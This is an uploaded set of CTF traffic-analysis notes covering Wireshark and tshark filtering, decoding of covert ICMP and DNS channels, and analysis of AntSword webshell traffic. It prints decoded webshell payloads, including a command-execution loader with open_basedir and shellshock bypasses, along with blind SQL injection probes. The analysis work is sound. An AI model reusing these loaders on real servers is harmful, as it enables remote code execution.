Traffic Analysis

This document is a comprehensive guide to traffic analysis with Wireshark and tshark, detailing filtering and search techniques for analysing network packets. It includes examples of decoding URLs, decrypting scripts and extracting flags from various data formats, and covers generating QR codes and handling protocols such as HTTP and ICMP to retrieve hidden information.

Uploaded by

day s
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
14 views38 pages

流量分析

The document provides a comprehensive guide on traffic analysis using Wireshark and Tshark, detailing various filtering and searching techniques for analyzing network packets. It includes examples of decoding URLs, decrypting scripts, and extracting flags from different data formats. Additionally, it covers methods for generating QR codes and handling various protocols like HTTP and ICMP to retrieve hidden information.

Uploaded by

day s
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 38

流量分析

Wireshark usage
1. Filtering

Common filter expressions

Wireshark filter
http.request.uri contains "php"
http.request.method == "POST"

2. Searching

For example, search the packet bytes directly for the string flag,
or for its hex encoding: 666c6167

3. Follow the stream and view the packet bytes in hexadecimal; from there, files of known formats carried in the transfer can be copied out.
4. Exporting HTTP objects

Save all of them
5. Viewing response data

Tshark usage
Bash
tshark -r shiftFlow.pcapng -T fields -e "http.request.full_uri" | grep -v '^\s*$'

-r: capture file to read
-T: output format
-e: field to extract
-Y: display filter

tshark -r sqltest.pcapng
tshark -r sqltest.pcapng -Y "http"
tshark -r sqltest.pcapng -Y "http" -T fields -e "http.request.uri"


Traffic analysis 1
Text (URL-encoded POST body)
cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D
%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXR
fdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2V
jaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J
EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQY
XRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VT
Ew7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kT
jskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c
3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7J
FI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQ
GlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNob
yAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=Q
zpcXFVzZXJzXFx4eGh6elxcRGVza3RvcFxcdXBsb2FkLWxhYnMtZW52LXdpb
i0wLjEtYmV0YS4xXFx1cGxvYWQtbGFicy1lbnZcXFdXV1xcdXBsb2FkXFw
%3D

URL-decoded:

Text
cmd=@eval(base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9s…
&z1=QzpcXFVzZXJzXFx4eGh6elxcRGVza3RvcFxcdXBsb2FkLWxhYnMtZW52LXdpbi0wLjEtYmV0YS4xXFx1cGxvYWQtbGFicy1lbnZcXFdXV1xcdXBsb2FkXFw=

z0 decoded:

PHP
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$D = base64_decode($_POST["z1"]);
$F = @opendir($D);
if ($F == NULL) {
    echo("ERROR:// Path Not Found Or No Permission!");
} else {
    $M = NULL;
    $L = NULL;
    while ($N = @readdir($F)) {
        $P = $D."/".$N;
        $T = @date("Y-m-d H:i:s", @filemtime($P));
        @$E = substr(base_convert(@fileperms($P), 10, 8), -4);
        $R = "\t".$T."\t".@filesize($P)."\t".$E."\n";
        if (@is_dir($P)) $M .= $N."/".$R;
        else $L .= $N.$R;
    }
    echo $M.$L;
    @closedir($F);
}
echo("|<-");
die();

z1 decoded:

Text
C:\\Users\\xxhzz\\Desktop\\upload-labs-env-win-0.1-beta.1\\
upload-labs-env\\WWW\\upload\\
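Decoding a request of this shape by hand (URL-decode, then base64-decode each z parameter) is tedious during triage. The following script is an added example, not part of the original notes: it parses a form body, base64-decodes every z<N> parameter, and reports which parameters carry PHP handed to eval(). The request body it runs on is constructed for the example (the z0 code and the z1 path are made up, not taken from the capture).

```python
import base64
import binascii
from urllib.parse import parse_qs, quote

# Constructed request body in the same shape as the captured POST above:
# an eval() of a base64-decoded "z0" parameter plus a base64 "z1" argument.
# The z0 code and the z1 path are made up for this example.
Z0_PLAIN = '@ini_set("display_errors","0");echo("->|");$D=base64_decode($_POST["z1"]);echo $D;echo("|<-");'
Z1_PLAIN = r"C:\\example\\upload\\"
SAMPLE_BODY = (
    "cmd=" + quote("@eval\x01(base64_decode($_POST[z0]));", safe="")
    + "&z0=" + quote(base64.b64encode(Z0_PLAIN.encode()).decode(), safe="")
    + "&z1=" + quote(base64.b64encode(Z1_PLAIN.encode()).decode(), safe="")
)

# Tokens that mark a parameter as PHP code fed to eval(), the pattern seen above.
INDICATORS = ("eval(", "base64_decode(", "$_POST[")


def decode_body(body):
    """URL-decode a form body and base64-decode every z<N> parameter.

    Returns {name: decoded value}. Non-printing bytes (such as the %01 between
    eval and the parenthesis) are kept so they are visible in review; a z
    parameter that is not valid base64 is returned verbatim."""
    params = parse_qs(body, keep_blank_values=True)
    out = {}
    for key, values in params.items():
        value = values[0]
        if key.startswith("z") and key[1:].isdigit():
            try:
                out[key] = base64.b64decode(value, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                out[key] = value
        else:
            out[key] = value
    return out


def suspicious(decoded):
    """Names of parameters whose decoded value contains an eval/base64/$_POST token."""
    return [key for key, value in decoded.items()
            if any(tok in value for tok in INDICATORS)]


if __name__ == "__main__":
    decoded = decode_body(SAMPLE_BODY)
    for key, value in decoded.items():
        print(f"{key}: {value!r}")
    print("flagged:", suspicious(decoded))
```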

Traffic analysis 2
Following the TCP stream reveals an encryption script:

Python
from Crypto.Cipher import AES

import base64

# Decryption function: the first 16 bytes of the ciphertext are used as the IV.
# This works because the IV was prepended to the plaintext before encryption,
# so the first ciphertext block acts as the IV for the rest of the message.
def decrypt(encrypted, passphrase):
    IV = encrypted[:16]
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(encrypted[16:])

# Encryption function: zero-pads the message to a multiple of 16 bytes
def encrypt(message, passphrase):
    IV = message[:16]
    length = 16
    count = len(message)
    padding = length - (count % length)
    message = message + b'\0' * padding
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)

# IV
IV = b'YUFHJKVWEASDGQDH'
message = IV + b'flag is hctf{xxxxxxxxxxxxxxx}'
print(len(message))
example = encrypt(message, b'Qq4wdrhhyEWe4qBF')
print(example)
example = decrypt(example, b'Qq4wdrhhyEWe4qBF')
print(example)

Text (base64 ciphertext)
mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV90XhAOkIs/OXoYVw5uQDjVvgNA==

Or decrypt it with CyberChef.

Traffic analysis 3
The capture shows flag.zip being output in hexadecimal; show the packet bytes

This yields the archive; its password is in the archive comment.
Traffic analysis 4
An RAR file is uploaded; extract the RAR data. The password is in the Host header

Extract it to get the flag

Traffic analysis 5

Take the data length of each ICMP packet as an ASCII code; the resulting base64 string decodes to the flag.

Bash
tshark -r analyse.pcapng -Y "icmp.type == 8" -e "data.len" -T fields

There is also DNS traffic whose query names contain many binary digits; presumably the names make up a QR code image

So extract the query names

Bash
tshark -r analyse.pcapng -Y "dns and ip.dst == 119.29.29.29" -T fields -e "dns.qry.name" | grep "0" | awk -F '.' '{print $1}'
1 is black and 0 is white; generate the QR code with Python

Python
from PIL import Image

# Bitmap rows recovered from the DNS query names: 1 = black, 0 = white
str = '''
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00011111111111100100000001100111001111111111110000
00011111111111100100000001100111001111111111110000
00011000000001100011110011100110001100000000110000
00011000000001100011110011100110001100000000110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100000111100011000001101111110110000
00011011111101100100110011100000001101111110110000
00011011111101100100110011100000001101111110110000
00011011111101100000001100000111001101111110110000
00011011111101100000001100000111001101111110110000
00011000000001100011000000011110001100000000110000
00011111111111100100110010011001001111111111110000
00011111111111100100110010011001001111111111110000
00000000000000000000111101111001000000000000000000
00000000000000000000111101111001000000000000000000
00000011001111100111000000011000110000011000110000
00000000001110000100110010000110111110011000110000
00000000001110000100110010000110111110011000110000
00000000001110000100110010000110111110011000110000
00000000001111111111110000000111110011111000110000
00000000001111111111110000000111110011111000110000
00000000001111111111110000000111110011111000110000
00000000111110000000110010000001000011111001110000
00000000111110000000110010000001000011111001110000
00000011001111111111111111100111001110011000110000
00000011111100000011000000011110001110000001110000
00000011111100000011000000011110001110000001110000
00011000110011100100000001111001000000000001110000
00011000110011100100000001111001000000000001110000
00000100001110011011110001111110110010011001000000
00000100001110011011110001111110110010011001000000
00011000111111111000001110011111111111100000110000
00000000000000000111111101100001000001100110110000
00000000000000000111111101100001000001100110110000
00011111111111100011001101111111001101111110110000
00011111111111100011001101111111001101111110110000
00011000000001100100110001100111000001111001110000
00011011111101100100111100000001111111111001000000
00011011111101100100111100000001111111111001000000
00011011111101100011111110011111000011100001000000
00011011111101100011111110011111000011100001000000
00011011111101100111000000011111000011100110110000
00011011111101100111000000011111000011100110110000
00011000000001100011001100000111110010011001000000
00011000000001100011001100000111110010011001000000
00011000000001100011001100000111110010011001000000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00011111111111100000000011111111110011111001110000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
'''
bits = str.replace("\n", "")
MAX = 50
pic = Image.new("RGB", (MAX, MAX))
i = 0
for y in range(0, MAX):
    for x in range(0, MAX):
        if bits[i] == '1':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        i = i + 1
pic.show()
pic.save("flag.png")

Black pixels are (0,0,0) and white pixels are (255,255,255). This gives the second part of the flag; the third part can be read directly from the HTTP traffic

Text
LQA0ADQAMwBhADYAOABiADgAfQA=

Decode it to get the flag.
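Both covert channels in this task (byte values hidden in ICMP data lengths, and bitmap rows hidden in DNS query labels) can be decoded from tshark's field output without an imaging library. The script below is an added example, not from the original notes: it turns a column of data.len values into the base64 text they spell and decodes it, keeps the first label of each query name when it consists only of 0/1, and writes the rows as a plain PBM image (a format any viewer opens, so PIL is not needed). The tshark output it consumes is constructed inline for the example; the file name flag.pbm is an arbitrary choice.

```python
import base64
import binascii

# Constructed tshark-style "data.len" output (not from the capture):
# one value per ICMP echo request, each the ASCII code of one base64 character.
SAMPLE_B64 = base64.b64encode(b"flag{icmp-length-channel}").decode()
SAMPLE_ICMP_LENS = "\n".join(str(ord(c)) for c in SAMPLE_B64) + "\n"

# Constructed "dns.qry.name" output: the first label of each name is one
# bitmap row (1 = black, 0 = white), as in the task above.
SAMPLE_DNS_NAMES = "\n".join([
    "1111.example.test",
    "1001.example.test",
    "1001.example.test",
    "1111.example.test",
]) + "\n"


def lengths_to_text(field_output):
    """Read one data.len value per line, treat each as an ASCII code, and
    base64-decode the string they spell. Blank or non-numeric lines (packets
    without a data layer) and values outside printable ASCII are skipped."""
    chars = []
    for line in field_output.splitlines():
        line = line.strip()
        if line.isdigit() and 32 <= int(line) < 127:
            chars.append(chr(int(line)))
    try:
        return base64.b64decode("".join(chars), validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return ""  # the length sequence does not form valid base64


def names_to_rows(field_output):
    """Keep the first label of each query name, but only labels made of 0/1."""
    rows = []
    for line in field_output.splitlines():
        label = line.strip().split(".")[0]
        if label and set(label) <= {"0", "1"}:
            rows.append(label)
    return rows


def rows_to_pbm(rows):
    """Render bit rows as a plain (P1) PBM image; in PBM a 1 is a black pixel,
    matching the task's convention. Short rows are padded with white."""
    width = max(len(r) for r in rows)
    header = f"P1\n{width} {len(rows)}\n"
    body = "\n".join(" ".join(r.ljust(width, "0")) for r in rows)
    return (header + body + "\n").encode()


if __name__ == "__main__":
    print("ICMP length channel:", lengths_to_text(SAMPLE_ICMP_LENS))
    rows = names_to_rows(SAMPLE_DNS_NAMES)
    with open("flag.pbm", "wb") as fh:
        fh.write(rows_to_pbm(rows))
    print(f"wrote flag.pbm with {len(rows)} rows")
```

The real capture is filtered with icmp.type == 8 first, as in the tshark command above, so that only the echo requests contribute lengths.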

Traffic analysis 6
The flag is in a response packet
Wireshark filter
http.response.code == 206
http and ip.dst == 192.168.43.109

Bash
tshark -r test.pcapng -Y "http and ip.dst == 192.168.43.109" -T fields -e "text" | awk -F ',' '{print $4}' | tr -d '\n'

Traffic analysis 7
Follow the stream, find a PNG, and open it in 010 Editor to get the flag.

Traffic analysis 8
Bash
tshark -r backdoor++.pcap -Y "icmp" -e "data.text" -T fields | grep -v "\!" | tr -d "\n"

Bash
tshark -r backdoor++.pcap -Y "icmp" -e "data" -T fields | grep -v "10111213" | tr -d "000000000000000000000000" | tr -d "\n"

Traffic analysis 9
Filter for HTTP and find POST requests carrying getshell traffic, then narrow the filter to
http.request.uri contains "1.php" for further analysis

There is an image-read operation; show the packet bytes of the response and view the image. It is probably the password for the flag archive, so save it for later


There is a shell command reading flag.zip

Set the packet-bytes cursor to the start of the zip stream, 504b0304, save it, and extract it with the password from the PNG


This yields flag{d75e00589d44a8e861c73732836d4218}

Traffic analysis 10
The PHP function str_rot13() applies ROT13 to a string. First, decode the code
PHP
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item."/.6afeb7ff";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};

function asenc($out) {
    return str_rot13($out);
};

function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "6e06"."4c06";
    echo @asenc($output);
    echo "48b86"."b89bf";
}
ob_start();
try {
    $p = base64_decode(substr($_POST["bda23544a23789"], 2));
    $s = base64_decode(substr($_POST["cc623db8237a89"], 2));
    $envstr = @base64_decode(substr($_POST["idbf4018a5aef8"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";

    function fe($f) {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    };

    function runshellshock($d, $c) {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("[email protected]", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    };

    function runcmd($c) {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("\n", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    };
    $ret = @runcmd($r." 2>&1");
    print ($ret != 0) ? "\nret={$ret}\n" : "\n";
} catch (Exception $e) {
    echo "\nERROR://".$e->getMessage();
};
asoutput();
die();

Each parameter is base64-decoded starting from its third character

PHP
$p = base64_decode(substr($_POST["bda23544a23789"], 2));
$s = base64_decode(substr($_POST["cc623db8237a89"], 2));
$envstr = @base64_decode(substr($_POST["idbf4018a5aef8"], 2));

The response looks wrong at first:
its output has been ROT13-encoded
Text (command parameter, base64)
Y2QgIi92YXIvd3d3L2h0bWwvY2hpbmF0ZWxlY29tIjtoZXhkdW1wIENhdFBhc3N3ZDtlY2hvIDBkYTYwMjdiNTtwd2Q7ZWNobyAyNDczNWNhOGRl

hexdump output as captured (still ROT13-encoded)
Text
bee8afd51dc0000000 2346 3p53 5259 4r57 6639 5969 5q2n 402r
0000010 7531 2p24 476p 7929 5q39 4n45 7o25 2n67
0000020 7932 4r3n 396s 2q33 6839 5149 4841 7625
0000030 7444 4s27 000n
0000035
0qn6027o5
/ine/jjj/ugzy/puvangryrpbz
24735pn8qr
327121b9c

After undoing ROT13
Text
2346 3c53 5259 4e57 6639 5969 5d2a 402e
7531 2c24 476c 7929 5d39 4a45 7b25 2a67
7932 4e3a 396f 2d33 6839 5149 4841 7625
7444 4f27 000a

As a byte string (hexdump prints 16-bit words with the low byte first, so each word is byte-swapped)
Text
4623533c5952574e396669592a5d2e403175242c6c472979395d454a257b672a32793a4e6f39332d39684951414825764474274f0a00

Decoded text
Text
F#S<YRWN9fiY*].@1u$,lG)y9]EJ%{g*2y:No93-9hIQAH%vDt'O
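The three manual steps above (strip the markers and undo ROT13, parse the hexdump, swap the bytes of each word) can be scripted. The following is an added example, not from the original notes: it unwraps a response body of the shape the script above produces, then reverses the default hexdump format, using the trailing offset line to trim the pad byte of an odd-length file. The marker strings are the ones in the script above; the response body is constructed from the hexdump shown on this page and is not the captured body (whose markers differ).

```python
import codecs
import re

# The script above wraps its output as prefix + str_rot13(output) + suffix.
PREFIX = "6e06" + "4c06"
SUFFIX = "48b86" + "b89bf"

# Constructed response body: the hexdump output and the other command output
# from this page, ROT13-encoded as they travel on the wire, between the markers.
ROT13_BODY = (
    "0000000 2346 3p53 5259 4r57 6639 5969 5q2n 402r\n"
    "0000010 7531 2p24 476p 7929 5q39 4n45 7o25 2n67\n"
    "0000020 7932 4r3n 396s 2q33 6839 5149 4841 7625\n"
    "0000030 7444 4s27 000n\n"
    "0000035\n"
    "0qn6027o5\n"
    "/ine/jjj/ugzy/puvangryrpbz\n"
    "24735pn8qr\n"
)
SAMPLE_RESPONSE = PREFIX + ROT13_BODY + SUFFIX

# offset (7 hex digits) followed by zero or more 4-hex-digit words
HEXDUMP_LINE = re.compile(r"^([0-9a-f]{7})((?:\s+[0-9a-f]{4})*)\s*$")


def unwrap_response(body, prefix=PREFIX, suffix=SUFFIX):
    """Strip the marker strings and undo str_rot13()."""
    if not (body.startswith(prefix) and body.endswith(suffix)):
        raise ValueError("markers not found: different session or encoder")
    inner = body[len(prefix):len(body) - len(suffix)]
    return codecs.decode(inner, "rot13")


def hexdump_to_bytes(text):
    """Reverse the default `hexdump` output: each word 'hhll' is the byte pair
    ll, hh (little-endian). The final offset-only line gives the file size and
    trims the pad byte of an odd-length file. Lines that are not hexdump rows
    (other command output) are ignored; '*' repeat markers are not expanded."""
    out = bytearray()
    total = None
    for line in text.splitlines():
        m = HEXDUMP_LINE.match(line.strip())
        if not m:
            continue
        words = m.group(2).split()
        if not words:
            total = int(m.group(1), 16)  # trailing offset line = byte count
            continue
        for w in words:
            out.append(int(w[2:], 16))  # low byte first
            out.append(int(w[:2], 16))
    if total is not None:
        out = out[:total]
    return bytes(out)


if __name__ == "__main__":
    plain = unwrap_response(SAMPLE_RESPONSE)
    print(plain)
    print(hexdump_to_bytes(plain))
```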

Traffic analysis 11: timu06.pcapng
Filter and inspect the FTP traffic; the server returns two files, so export them
The readme says the flag should be in secret.zip and that the password is all digits and at most 7 digits long, so brute-force it
Extracting gives flag{9edce3221e63c521f8f74cd9ba284006}

Traffic analysis 12: timu09.pcapng

Filter for HTTP and find boolean-based blind SQL injection traffic; extract the request URIs with tshark

Use CyberChef to URL-decode the log (URLdecode2)


Hand it to Python: extract the successful injection probes with a regular expression and assemble the flag

Python
import re

with open('http.log', 'r', encoding='utf-8') as file:
    lines = file.readlines()

# Characters recovered so far
converted_chars = []

prev_index = 1
prev_ascii_value = 0

# Walk every log line
for line in lines:
    # Match the position and the ASCII value compared in the blind-injection probe
    matches = re.search(r'\s*flag_is_here from flag limit 0,1\),(\d+),1\)\)=(\d+)\s*', line)

    if matches:
        index = int(matches.group(1))        # position within the flag string
        ascii_value = int(matches.group(2))  # ASCII code tested for that position
        if index > prev_index:
            char = chr(prev_ascii_value)  # the last value tested for the previous position is the hit
            converted_chars.append(char)
        prev_index = index
        prev_ascii_value = ascii_value

char = chr(prev_ascii_value)  # flush the final position
converted_chars.append(char)
# Join all recovered characters
result = ''.join(converted_chars)

# Print the result
if result:
    print(f'合并后的字符: {result}')
else:
    print('没有找到匹配的数字')

Output: 合并后的字符: flag{b1e2b79a2a7f190b1b939698caff8a30}

AntSword traffic analysis (Burp Suite)
Encoder
When AntSword controls a webshell and sends a packet to the server, the body of the packet is encoded or encrypted according to the rules defined in the encoder before it is sent. This avoids the obvious command-execution signatures that a WAF would otherwise block.
Traffic analysis
Connection traffic: the first action after connecting is listing the current directory. The captured traffic is as follows:

Request data

PHP
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item."/.3767bdde39a9";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};

function asenc($out) {
    return $out;
};

function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "f8e3a"."0e3a19";
    echo @asenc($output);
    echo "1e1c"."b37c";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D} ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;
} catch (Exception $e) {
    echo "ERROR://".$e->getMessage();
};
asoutput();
die();
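The encoder only rewrites the parameter values; the loader itself, with its open_basedir bypass, asenc()/asoutput() wrapper and output markers, reaches the server in clear text, and the base64-after-two-byte-prefix parameters from the previous task are easy to recognise. The script below is an added example, not from the original notes, of a simple detector for request bodies of this shape: it parses a POST body, looks for the clear-text loader strings, and checks whether any random-looking parameter name carries a value that base64-decodes cleanly after a 2-byte prefix (the reverse of substr($_POST[...], 2) in the script above). The two sample bodies are constructed here; the parameter name pass and the prefixes ab/cd are arbitrary, and the 14-character name pattern is taken from the parameter names on this page.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote

# Loader strings that the page's payloads carry in clear text.
LOADER_MARKERS = (
    '@ini_set("display_errors", "0")',
    '@ini_get("open_basedir")',
    "asenc(",
    "asoutput()",
    "ob_start()",
)
# Parameter names on this page (e.g. bda23544a23789) are 14 lowercase alphanumerics.
RANDOM_PARAM = re.compile(r"^[0-9a-z]{14}$")


def strip_prefix_base64(value, prefix_len=2):
    """Reverse of base64_decode(substr($_POST[...], 2)): drop the prefix and
    decode. Returns the text only if the remainder is valid base64 that
    decodes to printable ASCII; otherwise None."""
    if len(value) < 8:
        return None
    try:
        decoded = base64.b64decode(value[prefix_len:], validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if decoded and all(32 <= ord(ch) < 127 or ch in "\r\n\t" for ch in decoded):
        return decoded
    return None


def score_body(body):
    """Score one POST body: which loader markers appear, and which random-looking
    parameters decode cleanly after a 2-byte prefix. The threshold is a heuristic:
    two clear-text markers, or any prefixed-base64 parameter, flags the body."""
    params = parse_qs(body, keep_blank_values=True)
    found = set()
    prefixed = []
    for name, values in params.items():
        for value in values:
            found.update(m for m in LOADER_MARKERS if m in value)
            if RANDOM_PARAM.match(name) and strip_prefix_base64(value) is not None:
                prefixed.append(name)
    return {
        "markers": sorted(found),
        "prefixed_b64_params": prefixed,
        "suspicious": len(found) >= 2 or bool(prefixed),
    }


# Constructed sample bodies (not captured traffic). The first has the shape of the
# request above: a loader in the connection parameter plus two prefixed-base64
# parameters; the second is an ordinary login form.
LOADER_STUB = (
    '@ini_set("display_errors", "0");@set_time_limit(0);'
    '$opdir=@ini_get("open_basedir");'
    'function asenc($out){return $out;};'
    'function asoutput(){echo @asenc(ob_get_contents());}'
    'ob_start();'
)
SAMPLE_WEBSHELL_BODY = (
    "pass=" + quote(LOADER_STUB, safe="")
    + "&bda23544a23789=" + quote("ab" + base64.b64encode(b"/bin/sh").decode(), safe="")
    + "&cc623db8237a89=" + quote("cd" + base64.b64encode(b"uname -a").decode(), safe="")
)
SAMPLE_BENIGN_BODY = (
    "username=alice&password=" + quote("s3cret-Passw0rd!", safe="")
    + "&sessionid12345=deadbeefcafe1234&remember=1"
)

if __name__ == "__main__":
    for label, body in (("webshell", SAMPLE_WEBSHELL_BODY), ("login", SAMPLE_BENIGN_BODY)):
        print(label, score_body(body))
```

Because the markers are matched on the decoded body, the check belongs after URL decoding, and a different encoder (one that also base64-encodes the loader itself) would need the body decoded first; the prefixed-base64 check still applies to the parameters in that case.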
